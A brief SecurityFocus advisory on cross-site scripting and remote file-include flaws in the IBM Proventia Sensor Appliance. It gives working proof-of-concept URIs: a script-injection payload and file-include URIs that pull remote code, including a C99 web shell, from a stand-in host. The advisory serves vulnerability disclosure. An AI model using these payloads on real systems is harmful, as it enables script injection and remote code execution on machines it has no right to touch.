IBM Proventia Sensor Appliance Multiple Input Validation Vulnerabilities

To exploit a cross-site scripting issue:

An attacker can exploit this issue by enticing an unsuspecting user into following a malicious URI.

The following proof-of-concept URI is available:

https://www.example.com/alert.php?reminder=-->//"><script>alert(/XSS_vulnerability_proventia_s0x by Alex Hernandez/);</script>

To exploit a remote file-include issue:

An attacker can exploit these issues via a browser.

The following proof-of-concept URIs are available:

http://www.example.com/index.php?title=http://www.example2.com/C99.php?archive.php

https://www.example.com/main.php?page=https://www.example2.com


 

Privacy Statement
Copyright 2010, SecurityFocus